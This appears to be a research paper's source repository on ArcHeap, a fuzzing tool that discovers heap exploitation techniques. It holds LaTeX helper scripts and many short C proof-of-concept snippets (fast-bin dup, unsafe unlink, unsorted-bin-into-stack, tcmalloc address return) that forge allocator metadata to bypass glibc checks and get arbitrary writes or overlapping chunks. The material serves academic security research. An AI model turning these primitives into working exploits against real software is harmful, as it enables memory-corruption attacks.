Automatic Techniques to Systematically Discover New Heap Exploitation Primitives

Heap exploitation techniques to abuse the metadata of allocators have been widely studied since they are application independent and can be used in restricted environments that corrupt only metadata. Although prior work has found several interesting exploitation techniques, they are ad-hoc and manual, which cannot effectively handle changes or a variety of allocators. In this paper, we present a new naming scheme for heap exploitation techniques that systematically organizes them to discover the unexplored space in finding the techniques and ArcHeap, the tool that finds heap exploitation techniques automatically and systematically regardless of their underlying implementations. For that, ArcHeap generates a set of heap actions (e.g. allocation or deallocation) by leveraging fuzzing, which exploits common designs of modern heap allocators. Then, ArcHeap checks whether the actions result in impact of exploitations such as arbitrary write or overlapped chunks that efficiently determine if the actions can be converted into the exploitation technique. Finally, from these actions, ArcHeap generates Proof-of-Concept code automatically for an exploitation technique. We evaluated ArcHeap with real-world allocators --- ptmalloc, jemalloc, and tcmalloc --- and custom allocators from the DARPA Cyber Grand Challenge. ArcHeap successfully found 14 out of 16 known exploitation techniques and found five new exploitation techniques in ptmalloc. Moreover, ArcHeap found several exploitation techniques for jemalloc, tcmalloc, and even for the custom allocators. Further, ArcHeap can automatically show changes in exploitation techniques along with version change in ptmalloc using differential testing.

==> bin/aspell.sh <==
#!/bin/bash

DIC=$(dirname "$0")/../aspell.words
FILE=$2

# p: skip a param
# P: don't skip a param
# o: skip an optional param
# O: don't skip an optional param
TEXCMD=(--add-tex-command="autoref p"
        --add-tex-command='begin pop'
	      --add-tex-command='bibliography p'
      	--add-tex-command='bibliographystyle p'
      	--add-tex-command='cc p'
      	--add-tex-command='citeauthor p'
      	--add-tex-command='color p'
      	--add-tex-command='definecolor ppp'
      	--add-tex-command='eqref p'
      	--add-tex-command='fvset p'
      	--add-tex-command='hypersetup p'
      	--add-tex-command='lstset p'
      	--add-tex-command='mathit p'
      	--add-tex-command='mathrm p'
      	--add-tex-command='includeplot p'
      	--add-tex-command='includepdf p'
      	--add-tex-command='therev p'
      	--add-tex-command='newcommand pp'
      	--add-tex-command='renewcommand pp'
      	--add-tex-command='usetikzlibrary p'
      	--add-tex-command='DeclareMathOperator pp'
      	--add-tex-command='VerbatimInput p'
        --add-tex-command='includefig pp')

touch $DIC

if [ "$1" = "tex" ]; then
    aspell --lang en -x --mode=tex "${TEXCMD[@]}" -p $(pwd)/$DIC -c $FILE
elif [ "$1" = "svg" ]; then
    aspell --lang en -x --mode=sgml -p $(pwd)/$DIC -c $FILE
elif [ "$1" = "code" ]; then
    aspell --lang en -x --mode=ccpp -p $(pwd)/$DIC -c $FILE
else
    echo 'first arg should be either tex, svg, or code'
fi

VER=$(head -1 $DIC)
tail -n +2 $DIC | LC_ALL=C sort > $DIC~

echo $VER > $DIC
cat $DIC~ >> $DIC


==> bin/diff.sh <==
#!/bin/bash -x

ROOT=$(git rev-parse --show-toplevel)
TMPD=$(mktemp -d /tmp/latexdiff.XXXXXXXXXX)
HERE=$(realpath --relative-to=$ROOT $(pwd))

mkdir -p $TMPD

OLD_REPO=$TMPD/old

git clone $ROOT $OLD_REPO

cd $OLD_REPO
git checkout $1

NEWD=$ROOT/$HERE
OLDD=$OLD_REPO/$HERE

cd $OLDD
make
latexdiff --flatten p.tex $NEWD/p.tex > diff.tex

make MAIN=diff
cp -f diff.pdf $NEWD/diff.pdf

==> bin/get-tex-files.sh <==
#!/bin/sh

FLIST="$1"

while :;
do
    LAST="$FLIST"
    for F in $LAST; do
	NL=`cat $F | grep \\input{ | grep -v ^% | cut -d{ -f2 | cut -d} -f1`
	for F2 in $NL; do
	    FLIST="$FLIST $F2.tex"
	done
    done
    FLIST=`ls $FLIST | sort | uniq`

    if [ "$LAST" = "$FLIST" ]; then
	echo $LAST
	exit 0
    fi
done


==> bin/hyphens.sh <==
#!/bin/sh

if [ "$1" = "" ]; then
    echo "usage: `basename $0` <file> ..."
    exit
fi

grep --color ly- "$@"
exit 0



==> bin/mark.py <==
#!/usr/bin/env python3

import sys

TR = {
    r"\PY{o}{*}": r"$\star$",
}

for l in sys.stdin.readlines():
    for k, v in TR.items():
        if l.startswith(k):
            l = l.replace(k, v, 1)
            break
    print(l, end="")

==> bin/parse-latex-log.py <==
#!/usr/bin/python
#
# Taesoo Kim
#
# Original License:
# 
#   This file is part of Rubber and thus covered by the GPL
#   (c) Emmanuel Beffara, 2002--2006
#   Modified by Olivier Verdier <olivier.verdier@gmail.com>

import re
import sys

# The function `_' is defined here to prepare for internationalization.
def _ (txt): return txt

re_loghead    = re.compile("This is [0-9a-zA-Z-]*(TeX|Omega)")
re_rerun      = re.compile("LaTeX Warning:.*Rerun")
re_file       = re.compile("(\\((?P<file>[^ \n\t(){}]*)|\\))")
re_badbox     = re.compile(r"(Ov|Und)erfull \\[hv]box ")
re_line       = re.compile(r"(l\.(?P<line>[0-9]+)( (?P<code>.*))?$|<\*>)")
re_cseq       = re.compile(r".*(?P<seq>\\[^ ]*) ?$")
re_page       = re.compile("\[(?P<num>[0-9]+)\]")
re_atline     = re.compile("( detected| in paragraph)? at lines? (?P<line>[0-9]*)(--(?P<last>[0-9]*))?")
re_reference  = re.compile("LaTeX Warning: Reference `(?P<ref>.*)' on page (?P<page>[0-9]*) undefined on input line (?P<line>[0-9]*)\\.$")
re_citation   = re.compile("^.*Citation `(?P<cite>.*)' on page (?P<page>[0-9]*) undefined on input line (?P<line>[0-9]*)\\.$")
re_label      = re.compile("LaTeX Warning: (?P<text>Label .*)$")
re_warning    = re.compile("(LaTeX|Package)( (?P<pkg>.*))? Warning: (?P<text>.*)$")
re_online     = re.compile("(; reported)? on input line (?P<line>[0-9]*)")
re_ignored    = re.compile("; all text was ignored after line (?P<line>[0-9]*).$")

class LogCheck (object):
    """
    This class performs all the extraction of information from the log file.
    For efficiency, the instances contain the whole file as a list of strings
    so that it can be read several times with no disk access.
    """
    #-- Initialization {{{2

    def __init__ (self):
        self.lines = None

    def read (self, name):
        """
        Read the specified log file, checking that it was produced by the
        right compiler. Returns true if the log file is invalid or does not
        exist.
        """
        self.lines = None
        with open(name) as file:
            line = file.readline()
            if not line:
                file.close()
                raise ValueError("Empty file")
            if not re_loghead.match(line):
                file.close()
                raise ValueError("This doesn't seem to be a tex log file")
            self.lines = file.readlines()

    #-- Process information {{{2

    def errors (self):
        """
        Returns true if there was an error during the compilation.
        """
        skipping = 0
        for line in self.lines:
            if line.strip() == "":
                skipping = 0
                continue
            if skipping:
                continue
            m = re_badbox.match(line)
            if m:
                skipping = 1
                continue
            if line[0] == "!":
                # We check for the substring "pdfTeX warning" because pdfTeX
                # sometimes issues warnings (like undefined references) in the
                # form of errors...

                if "pdfTeX warning" in line:
                    return True
        return False

    def run_needed (self):
        """
        Returns true if LaTeX indicated that another compilation is needed.
        """
        for line in self.lines:
            if re_rerun.match(line):
                return True
        return False

    #-- Information extraction {{{2

    def continued (self, line):
        """
        Check if a line in the log is continued on the next line. This is
        needed because TeX breaks messages at 79 characters per line. We make
        this into a method because the test is slightly different in Metapost.
        """
        return len(line) == 79 and line[-3:] != '...'

    def parse (self, errors=False, boxes=False, refs=False, warnings=False):
        """
        Parse the log file for relevant information. The named arguments are
        booleans that indicate which information should be extracted:
        - errors: all errors
        - boxes: bad boxes
        - refs: warnings about references
        - warnings: all other warnings
        The function returns a generator. Each generated item is a dictionary
        that contains (some of) the following entries:
        - kind: the kind of information ("error", "box", "ref", "warning")
        - text: the text of the error or warning
        - code: the piece of code that caused an error
        - file, line, last, pkg: as used by Message.format_pos.
        """
        if not self.lines:
            return
        last_file = None
        pos = [last_file]
        page = 1
        parsing = False   # True if we are parsing an error's text
        skipping = False  # True if we are skipping text until an empty line
        something = False # True if some error was found
        prefix = None  # the prefix for warning messages from packages
        accu = ""      # accumulated text from the previous line
        for line in self.lines:
            line = line[:-1]  # remove the line feed

            # TeX breaks messages at 79 characters, just to make parsing
            # trickier...

            if self.continued(line):
                accu += line
                continue
            line = accu + line
            accu = ""

            # Text that should be skipped (from bad box messages)

            if prefix is None and line == "":
                skipping = False
                continue

            if skipping:
                continue

            # Errors (including aborted compilation)

            if parsing:
                if error == "Undefined control sequence.":
                    # This is a special case in order to report which control
                    # sequence is undefined.
                    m = re_cseq.match(line)
                    if m:
                        error = "Undefined control sequence %s." % m.group("seq")
                m = re_line.match(line)
                if m:
                    parsing = False
                    skipping = True
                    pdfTeX = "pdfTeX warning" in line
                    if (pdfTeX and warnings) or (errors and not pdfTeX):
                        if pdfTeX:
                            d = {
                                "kind": "warning",
                                "pkg": "pdfTeX",
                                "text": error[error.find(":")+2:]
                            }
                        else:
                            d = {
                                "kind": "error",
                                "text": error
                            }
                        d.update( m.groupdict() )
                        m = re_ignored.search(error)
                        if m:
                            d["file"] = last_file
                            if d.has_key("code"):
                                del d["code"]
                            d.update( m.groupdict() )
                        elif pos[-1] is None:
                            d["file"] = last_file
                        else:
                            d["file"] = pos[-1]
                        yield d
                elif line[0] == "!":
                    error = line[2:]
                elif line[0:3] == "***":
                    parsing = False
                    skipping = True
                    if errors:
                        yield   {
                            "kind": "abort",
                            "text": error,
                            "why" : line[4:],
                            "file": last_file
                            }
                elif line[0:15] == "Type X to quit ":
                    parsing = False
                    skipping = False
                    if errors:
                        yield   {
                            "kind": "error",
                            "text": error,
                            "file": pos[-1]
                            }
                continue

            if len(line) > 0 and line[0] == "!":
                error = line[2:]
                parsing = True
                continue

            if line == "Runaway argument?":
                error = line
                parsing = True
                continue

            # Long warnings

            if prefix is not None:
                if line[:len(prefix)] == prefix:
                    text.append(line[len(prefix):].strip())
                else:
                    text = " ".join(text)
                    m = re_online.search(text)
                    if m:
                        info["line"] = m.group("line")
                        text = text[:m.start()] + text[m.end():]
                    if warnings:
                        info["text"] = text
                        d = { "kind": "warning" }
                        d.update( info )
                        yield d
                    prefix = None
                continue

            # Undefined references

            m = re_reference.match(line)
            if m:
                if refs:
                    d = {
                        "kind": "warning",
                        "text": _("Reference `%s' undefined.") % m.group("ref"),
                        "file": pos[-1]
                        }
                    d.update( m.groupdict() )
                    yield d
                continue

            m = re_citation.match(line)
            if m:
                if refs:
                    d = {
                        "kind": "warning",
                        "text": _("Citation `%s' undefined.") % m.group("cite"),
                        "file": pos[-1]
                        }
                    d.update( m.groupdict() )
                    yield d
                continue

            m = re_label.match(line)
            if m:
                if refs:
                    d = {
                        "kind": "warning",
                        "file": pos[-1]
                        }
                    d.update( m.groupdict() )
                    yield d
                continue

            # Other warnings

            if line.find("Warning") != -1:
                m = re_warning.match(line)
                if m:
                    info = m.groupdict()
                    info["file"] = pos[-1]
                    info["page"] = page
                    if info["pkg"] is None:
                        del info["pkg"]
                        prefix = ""
                    else:
                        prefix = ("(%s)" % info["pkg"])
                    prefix = prefix.ljust(m.start("text"))
                    text = [info["text"]]
                continue

            # Bad box messages

            m = re_badbox.match(line)
            if m:
                if boxes:
                    mpos = { "file": pos[-1], "page": page }
                    m = re_atline.search(line)
                    if m:
                        md = m.groupdict()
                        for key in "line", "last":
                            if md[key]: mpos[key] = md[key]
                        line = line[:m.start()]
                    d = {
                        "kind": "warning",
                        "text": line
                        }
                    d.update( mpos )
                    yield d
                skipping = True
                continue

            # If there is no message, track source names and page numbers.

            last_file = self.update_file(line, pos, last_file)
            page = self.update_page(line, page)

    def get_errors (self):
        return self.parse(errors=True)
    def get_boxes (self):
        return self.parse(boxes=True)
    def get_references (self):
        return self.parse(refs=True)
    def get_warnings (self):
        return self.parse(warnings=True)

    def update_file (self, line, stack, last):
        """
        Parse the given line of log file for file openings and closings and
        update the list `stack'. Newly opened files are at the end, therefore
        stack[1] is the main source while stack[-1] is the current one. The
        first element, stack[0], contains the value None for errors that may
        happen outside the source. Return the last file from which text was
        read (the new stack top, or the one before the last closing
        parenthesis).
        """
        m = re_file.search(line)
        while m:
            if line[m.start()] == '(':
                last = m.group("file")
                stack.append(last)
            else:
                last = stack[-1]
                del stack[-1]
            line = line[m.end():]
            m = re_file.search(line)
        return last

    def update_page (self, line, before):
        """
        Parse the given line and return the number of the page that is being
        built after that line, assuming the current page before the line was
        `before'.
        """
        ms = re_page.findall(line)
        if ms == []:
            return before
        return int(ms[-1]) + 1

if __name__ == '__main__':
    if len(sys.argv) == 2:
        args = sys.argv[1:]
    else:
        args = ["/dev/stdin"]

    found = False
    for pn in args:
        parser = LogCheck()
        parser.read(pn)
        errs = list(parser.get_errors())
        for e in errs:
            found = True
            if "line" not in e:
                e["line"] = "-"
            print("{file}:{line}:\033[0;31m{kind}\033[0m:{text}".format(**e))
            if "code" in e:
                print("> {code}".format(**e))

    exit(0 if found else 1)

==> bin/passive.sh <==
#!/bin/bash
#
# http://matt.might.net/articles/shell-scripts-for-passive-voice-weasel-words-duplicates/
#
 
irregulars="awoken|\
been|born|beat|\
become|begun|bent|\
beset|bet|bid|\
bidden|bound|bitten|\
bled|blown|broken|\
bred|brought|broadcast|\
built|burnt|burst|\
bought|cast|caught|\
chosen|clung|come|\
cost|crept|cut|\
dealt|dug|dived|\
done|drawn|dreamt|\
driven|drunk|eaten|fallen|\
fed|felt|fought|found|\
fit|fled|flung|flown|\
forbidden|forgotten|\
foregone|forgiven|\
forsaken|frozen|\
gotten|given|gone|\
ground|grown|hung|\
heard|hidden|hit|\
held|hurt|kept|knelt|\
knit|known|laid|led|\
leapt|learnt|left|\
lent|let|lain|lighted|\
lost|made|meant|met|\
misspelt|mistaken|mown|\
overcome|overdone|overtaken|\
overthrown|paid|pled|proven|\
put|quit|read|rid|ridden|\
rung|risen|run|sawn|said|\
seen|sought|sold|sent|\
set|sewn|shaken|shaven|\
shorn|shed|shone|shod|\
shot|shown|shrunk|shut|\
sung|sunk|sat|slept|\
slain|slid|slung|slit|\
smitten|sown|spoken|sped|\
spent|spilt|spun|spit|\
split|spread|sprung|stood|\
stolen|stuck|stung|stunk|\
stridden|struck|strung|\
striven|sworn|swept|\
swollen|swum|swung|taken|\
taught|torn|told|thought|\
thrived|thrown|thrust|\
trodden|understood|upheld|\
upset|woken|worn|woven|\
wed|wept|wound|won|\
withheld|withstood|wrung|\
written"
 
if [ "$1" = "" ]; then
    echo "usage: `basename $0` <file> ..."
    exit
fi

for F in "$@";
do
    cat $F | grep -v ^% | tr \\n\\r '  ' |
    egrep -i --color=always \
	"\\b(am|are|were|being|is|been|was|be)\
\\b[ ]*(\w+ed|($irregulars))\\b" |
    fmt -w70 | awk '{print "'$F':", $0;}' | grep ''
done

exit 0



==> bin/shortmonth.sh <==
#!/bin/sh
perl -pi -e 's,January,Jan,;
	     s,February,Feb,;
	     s,March,Mar,;
	     s,April,Apr,;
	     s,June,Jun,;
	     s,July,Jul,;
	     s,August,Aug,;
	     s,September,Sep,;
	     s,October,Oct,;
	     s,November,Nov,;
	     s,December,Dec,;' "$@"


==> bin/weasel.sh <==
#!/bin/bash
#
# http://matt.might.net/articles/shell-scripts-for-passive-voice-weasel-words-duplicates/
#
 
weasels="many|various|very|fairly|several|extremely\
|exceedingly|quite|remarkably|few|surprisingly\
|mostly|largely|huge|tiny|((are|is) a number)\
|excellent|interestingly|significantly\
|substantially|clearly|vast|relatively|completely"
 
if [ "$1" = "" ]; then
    echo "usage: `basename $0` <file> ..."
    exit
fi

for F in "$@";
do
    cat $F | grep -v ^% | tr \\n\\r '  ' |
    egrep -i --color=always "\\b($weasels)\\b" |
    fmt -w70 | awk '{print "'$F':", $0;}' | grep ''
done

exit 0



==> code/example.c <==
void* p[256];
intptr_t buf[256];
int main() {
  p[0] = malloc(29);
  p[1] = malloc(29);
  free(p[0]);
  p[2] = malloc(956712);
  // [BUG] Double free
  free(p[0]);
  p[3] = malloc(40);
  p[4] = malloc(40);
  // [MAY_EXPLOITABLE] Found overlap in chunks
  // p[4]=0x606010 (size=40), p[3]=0x606010 (size=40)
}


==> code/fast-bin-dup-consolidate.c <==
int main() {
  int sz = rand_size(FAST_BIN);
  void* p1 = malloc(sz);
  void* p2 = malloc(sz);
  free(p1);
  void* p3 = malloc(rand_size(SMALL_BIN));
  // malloc_consolidate() will be called
  free(p3);
  // [BUG] Double free
  free(p1);
  assert(malloc(sz) == malloc(sz));
}


==> code/fast-bin-dup-tcache.c <==
// With tcache
int main() {
  void* p1 = malloc(8);
  free(p1);
  free(p1);

  void* p2 = malloc(8);
  void* p3 = malloc(8);
  assert(p2 == p3);
}


==> code/fast-bin-dup-waf.c <==
int main() {
  int sz = rand_size(FAST_BIN);
  char* p1 = malloc(sz);
  char* p2 = malloc(sz);
  free(p2);
  // [BUG] Write-after-free
  // Corrupt a pointer of the fast bin free list
  raw_to_chunk(p2)->fd = raw_to_chunk(p2);
  assert(malloc(sz) == malloc(sz));
}


==> code/fast-bin-dup.c <==
int main() {
    int sz = rand_size(FAST_BIN);
    void* p1 = malloc(sz);
    void* p2 = malloc(sz);
    free(p1);
    // Required to bypass a security check
    free(p2); 
    // [BUG] Double free
    free(p1);
    void* p3 = malloc(sz);
    void* p4 = malloc(sz);
    void* p5 = malloc(sz);
    assert(p3 == p5);
}


==> code/fast-bin-to-other-bin.c <==
  // [PRE-CONDITION]
  //    fsz: any fast bin size
  //    sz: any non-fast-bin size
  //    lsz: any largebin size
  // [BUG] write free memory
  // [POST-CONDITION]
  //    malloc(sz) = fake - offsetof(struct malloc_chunk, fd)
  void* p1 = malloc(fsz);
  free(p1);

  // create a fake chunk
  struct malloc_chunk *fake = dst;
  // set P=1 to avoid a security check
  fake->size = chunk_size(sz) | 1;
  fake->fd = NULL;

  // create 'fake2': a next chunk of 'fake'
  struct malloc_chunk *fake2 = dst + chunk_size(sz);
  // set P=1 to avoid a security check
  fake2->size = 1;

  struct malloc_chunk *c1 = raw_to_chunk(p1);
  // [BUG] set a forward pointer of fast bin into fake
  // this can be done by a normal heap write since p4 is allocated
  c1->fd = fake;

  // now a fast bin list: c1 -> fake
  // call malloc_consolidate to move
  // 'fake' to the unsorted bin
  malloc(lsz);

  assert(raw_to_chunk(malloc(sz)) == fake);


==> code/house-of-unsorted-einherjar.c <==
  // [PRE-CONDITION]
  //    sz: small bin size
  //    assert(chunk_size(sz) & 0xff == 0);
  // [BUG] off-by-one NULL
  // [POST-CONDITION]
  //    assert(raw_to_chunk(malloc(sz)) == fake);

  // the lowest byte of chunk_size(sz) needs to be zero
  // to avoid chaning its size when triggering a bug
  // assert(chunk_size(sz) & 0xff == 0);
  char *p1 = malloc(sz);
  char *p2 = malloc(sz);
  char *p3 = malloc(sz);
  char *p4 = malloc(sz);

  // move p1 to unsorted bin
  free(p1);

  struct malloc_chunk* c3 = raw_to_chunk(p3);
  // make prev_size into double to cover a large chunk
  // this is valid by writing p2's last data
  c3->prev_size = chunk_size(sz) * 2;
  // [BUG] use off-by-one NULL to make P=0 in c3
  assert((c3->size & 0xff) == 0x01);
  c3->size &= ~1;

  // this will merge p1 & p3
  free(p3);

  // if we allocate p5,
  // p2 is now points to a free chunk in the unsorted bin
  char *p5 = malloc(sz);

  // it's unsorted bin into stack
  struct malloc_chunk* fake = (void*)buf;
  // set fake->size to chunk_size(sz) for later allocation
  fake->size = chunk_size(sz);
  // set fake->bk to any writable address to avoid crash
  fake->bk = (void*)buf;

  struct malloc_chunk* c2 = raw_to_chunk(p2);
  c2->bk = fake;

  assert(raw_to_chunk(malloc(sz)) == fake);


==> code/jemalloc-double-free.c <==
  // [PRE-CONDITION]
  //    sz : any size
  // [BUG] double free
  // [POST-CONDITION]
  //    malloc(sz) == malloc(sz)
  void* p = malloc(sz);
  free(p);

  // [BUG] free 'p' again
  // this is allowed due to lack of security checks
  free(p);

  assert(malloc(sz) == malloc(sz));


==> code/malloc-consolidate.c <==
static void
_int_free (mstate av, mchunkptr p, int have_lock) {
  ...
  /*
   If the chunk borders the current high end of memory,
   consolidate into top
   */
  else {
    size += nextsize;
    ...
  }
  ...
  if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
    if (have_fastchunks(av))
      malloc_consolidate(av);
  ...
}


==> code/new-unlink-exploit.c <==
  // Same PRE/POST CONDITIONS and BUG as (b)
  void *p1 = malloc(sz);
  void *p2 = malloc(sz);

  struct malloc_chunk *fake = p1;
  // bypassing (1): P->size == next_chunk(P)->prev_size
  fake->size = sizeof(void*);
  // bypassing (2): P->fd->bk == P && P->bk->fd == P
  fake->fd = (void*)&p1 - offsetof(struct malloc_chunk, bk);
  fake->bk = (void*)&p1 - offsetof(struct malloc_chunk, fd);

  struct malloc_chunk *c2 = raw_to_chunk(p2);

  // [BUG] overflowing p1: it shrinks the previous chunk's size,
  // tricking `fake' as the previous chunk
  c2->prev_size = chunk_size(sz) \
                  - offsetof(struct malloc_chunk, fd);
  // tricking the previous chunk freed, P=0
  c2->size &= ~1;

  // triggering unlink(fake) via backward consolidation
  free(p2);

  assert(p1 == (void*)&p1 - offsetof(struct malloc_chunk, bk));
  // writing with p1: overwriting itself to dst
  *(void**)(p1 + offsetof(struct malloc_chunk, bk)) = target;
  // writing with p1: overwriting *dst with val
  *(void**)p1 = (void*)val;

  assert(*dst == val);


==> code/new-unlink.c <==
#define unlink(AV, P, BK, FD) {                           \
*    if (__builtin_expect (                               \
*          chunksize(P) != prev_size (next_chunk(P)), 0)) \
*      malloc_printerr ("corrupted size vs. prev_size");  \
    FD = P->fd;                                           \
    BK = P->bk;                                           \
*    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))\
*      malloc_printerr ("corrupted double-linked list");  \
*    else {                                               \
       FD->bk = BK;                                       \
       BK->fd = FD;                                       \
        ...                                               \
*    }                                                    \
}


==> code/new-unlink.h <==
int unlink(AV, P, BK, FD)                                    \
    /* (1) checking if size == the next chunk's prev_size */     \
*   if (chunksize(P) != prev_size(next_chunk(P)))                \
*     malloc_printerr("corrupted size vs. prev_size");           \
    FD = P->fd;                                                  \
    BK = P->bk;                                                  \
    /* (2) checking if prev/next chunks correctly point to me */ \
*   if (FD->bk != P || BK->fd != P)                              \
*     malloc_printerr("corrupted double-linked list");           \
*   else {                                                       \
      FD->bk = BK;                                               \
      BK->fd = FD;                                               \
      ...                                                        \
*    }


==> code/old-unlink-exploit.c <==
  // [PRE-CONDITION]
  //   sz : any non-fast-bin size
  //   dst: where to write (void*)
  //   val: target value (ptr to writable memory)
  // [BUG] buffer overflow (p1)
  // [POST-CONDITION]
  //   *dst = val
  void *p1 = malloc(sz);
  void *p2 = malloc(sz);

  struct malloc_chunk *c2 = raw_to_chunk(p2);

  // [BUG] overflowing p1
  c2->prev_size = 0;
  // next chunk's size == c2's prev_size, tricking c2 freed (P=0)
  c2->size = -sizeof(void*);
  c2->fd = dst - offsetof(struct malloc_chunk, bk);
  c2->bk = val;

  // trigger unlink(c2) via forward consolidation
  free(p1);

  assert(*dst == val);


==> code/overlapping-chunks-smallbin.c <==
  // [PRE-CONDITION]
  //    sz : any small bin size
  //    sz2 : any small bin size
  //    assert(sz2 > sz)
  // [BUG] buffer overflow
  // [POST-CONDITION]
  //    two chunks overlap

  void* p1 = malloc(sz);
  void* p2 = malloc(sz);
  void* p3 = malloc(sz);

  // move p2 to the unsorted bin
  free(p2);

  // move p2 to the small bin
  void* p4 = malloc(sz2);

  // [BUG] overflowing p1
  struct malloc_chunk *c2 = raw_to_chunk(p2);
  // growing size into double
  c2->size = 2 * chunk_size(sz) | 1;

  // p5's chunk size = chunk_size(sz) * 2
  void *p5 = malloc(sz);
  // move p5 to the unsorted bin
  free(p5);

  // splitting p5 into half and returning p6
  void* p6 = malloc(sz);
  // returning the remainder
  void* p7 = malloc(sz);

  // p3 and p7 overlap
  assert(p3 == p7);


==> code/overlapping-chunks.c <==
int main() {
  int sz1 = rand_size(SMALL_BIN);
  char *p1 = malloc(sz1);
  int sz2 = rand_size(ANY);
  char *p2 = malloc(sz2);
  // p1 goes to unsorted bin
  free(p1);
  // [BUG] Overflow
  raw_to_chunk(p1)->size = (chunk_size(sz1) + chunk_size(sz2)) | 1;
  // Require exact size for allocation
  char *p3 = malloc(sz1 + chunk_size(sz2));
  overlap(p2, p3);
}


==> code/ptmalloc-metadata.c <==
struct malloc_chunk {
  // size of "previous" chunk
  //  (only valid when the previous chunk is freed, P=0)
  size_t prev_size;  
  
  // size in bytes (aligned by double words): lower bits
  // indicate various states of the current/previous chunk
  //   A: alloced in a non-main arena
  //   M: mmapped
  //   P: "previous" in use (i.e., P=0 means freed)
  size_t size;

  // double links for free chunks in small/large bins
  //  (only valid when this chunk is freed)
  struct malloc_chunk* fd;
  struct malloc_chunk* bk;
  
  // double links for next larger/smaller size in largebins
  //  (only valid when this chunk is freed)
  struct malloc_chunk* fd_nextsize;
  struct malloc_chunk* bk_nextsize;
};


==> code/tcmalloc-arbitrary-address-return.c <==
  // [PRE-CONDITION]
  //    sz : any size
  // [BUG] buffer overflow
  // [POST-CONDITION]
  //    malloc(sz) == dst
  void* p = malloc(sz);
  // [BUG] overflowing p
  // tcmalloc has a next chunk address at the end of a chunk
  *(void**)(p + malloc_usable_size(p)) = dst;

  // this malloc changes a next chunk address into dst
  malloc(sz);

  assert(malloc(sz) == dst);


==> code/tcmalloc-duplicate.c <==
  // [PRE-CONDITION]
  //    sz : any size < 0x100
  // [BUG] off-by-one null overflow
  // [POST-CONDITION]
  //    malloc(sz) == already allocated one
  void* p = malloc(sz);

  // p's lowest byte is zero in tcmalloc
  assert((intptr_t)p & 0xff == 0);

  // [BUG] off-by-one-null overflow
  // it clears a lowest byte of a next chunk address
  // to make the next chunk same with 'p'
  *(char*)(p + malloc_usable_size(p)) = 0;

  // it updates the next chunk address == 'p'
  malloc(sz);

  assert(p == malloc(sz));


==> code/unaligned-double-free.c <==
  // [PRE-CONDITION]
  //    sz1: non-fast-bin size
  //    sz2: non-fast-bin size
  //    sz1 and sz2 have the following relationship;
  //    assert(chunk_size(sz1) * a == chunk_size(sz2) * b);
  // [BUG] double free
  // [POST-CONDITION]
  //    two chunks overlap

  for (int i = 0; i < a; i++)
    p1[i] = malloc(sz1);

  // allocate a chunk to prevent merging with the top chunk
  void* p = malloc(0);

  // free from backward not to modify size of p1[a - 1]
  for (int i = a - 1; i >= 0; i--)
    free(p1[i]);

  // allocate chunks to fill empty space
  for (int i = 0; i < b; i++)
    p2[i] = malloc(sz2);

  // now a next free chunk of p1[a-1] is p whose P=1,
  // and p1[a-1] contains valid metadata
  // since malloc does not clean up the memory

  // [BUG] double free
  free(p1[a-1]);

  // now new allocation returns p1[a-1]
  // that overlaps with p2[b-1]
  assert(malloc(sz1) == p1[a-1]);


==> code/unsafe-unlink-poc.c <==
  p[0] = malloc(760);
  p[1] = malloc(768);
  // struct malloc_chunk *fake = p[1];
  // p[1]->fd = &p[0] + -16
  //        = &p[1] - offsetof(struct malloc_chunk, bk);
  *(uintptr_t*)(p[1] + 16) = (uintptr_t)&p[0] + -16;
  // p[1]->bk = &p[0] + -8
  //        = &p[1] - offsetof(struct malloc_chunk, fd);
  *(uintptr_t*)(p[1] + 24) = (uintptr_t)&p[0] + -8;
  p[2] = malloc(760);

  // [BUG] overflowing p[1]: it shrink the p[2]'s size
  // tricking 'fake' as the previous chunk
  *(uintptr_t*)(p[1] + 768) = 768;
  // tricking p[2] freed, P = 0
  *(uintptr_t*)(p[1] + 776) = 768;

  // triggering unsafe(fake) via backward consolidation
  free(p[2]);

  // assert(p[1]
  //    == (void*)&p[1] - offsetof(struct malloc_chunk, bk));
  // writing with p[1]: overwriting p[3] to &buf[0]
  ((uintptr_t*)p[1])[5] = (uintptr_t)&buf[0];

  // p[3] becomes a valid pointer to write..
  // writing with p[3]: overwrite &buf[0] with 800
  ((uintptr_t*)p[3])[0] = 800;
  // assert(buf[0] == 800);


==> code/unsorted-bin-into-stack.c <==
  // [PRE-CONDITION]
  //    sz : any non-fast-bin size
  // [BUG] buffer overflow
  // [POST-CONDITION]
  //    malloc(sz) = dst + offsetof(struct malloc_chunk, fd)
  void* p1 = malloc(sz);
  void* p2 = malloc(sz);
  void* p3 = malloc(sz);

  // move p2 to the unsorted bin
  free(p2);

  // create a fake chunk at dst
  struct malloc_chunk *fake = dst;
  // set fake->size to be the chunk size of the last allocation
  fake->size = chunk_size(sz);
  // set fake->bk to any writable address to avoid a crash
  fake->bk = fake;

  // [BUG] overflowing p1
  struct malloc_chunk *c2 = raw_to_chunk(p2);
  // size should be smaller than the next allocation size
  // to avoid returning c2 in the next allocation
  // size shouldn't be too small due to a security check
  c2->size = 2 * sizeof(size_t);
  // set the next pointer in the unsorted bin
  c2->bk = fake;

  // now unsorted bin: c2 -> fake,
  // and c2 is too small for the request.
  // therefore, next allocation returns the fake chunk
  assert(malloc(sz) == fake + offsetof(struct malloc_chunk, fd));


==> release.sh <==
#!/bin/bash

git archive -o die.tar.gz HEAD

